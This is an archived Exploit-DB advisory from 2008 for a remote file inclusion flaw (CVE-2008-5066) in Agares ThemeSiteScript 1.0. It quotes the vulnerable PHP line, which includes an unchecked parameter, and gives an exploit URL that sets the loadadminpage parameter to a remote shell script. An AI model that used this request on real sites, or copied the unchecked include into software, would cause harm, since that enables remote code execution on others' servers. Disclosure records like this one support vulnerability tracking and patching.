Agares ThemeSiteScript 1.0 loadadminpage RFI Vulnerability

2008-10-28T00:00:00
ID EDB-ID:6859
Type exploitdb
Reporter DaRkLiFe
Modified 2008-10-28T00:00:00

Description

Agares ThemeSiteScript 1.0 (loadadminpage) RFI Vulnerability. CVE-2008-5066. Webapps exploit for php platform

                                        
                                            **************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d

**************************************************************************************
Script   :

ThemeSiteScript v1.0 Remote File Inclusion Vulnerability

Home Page :

http://agaresmedia.com

Download :

http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar

**************************************************************************************

Exploit :

http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?

**************************************************************************************

Vulnerable : line 2 : <?PHP include($loadadminpage); ?>

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

# milw0rm.com [2008-10-28]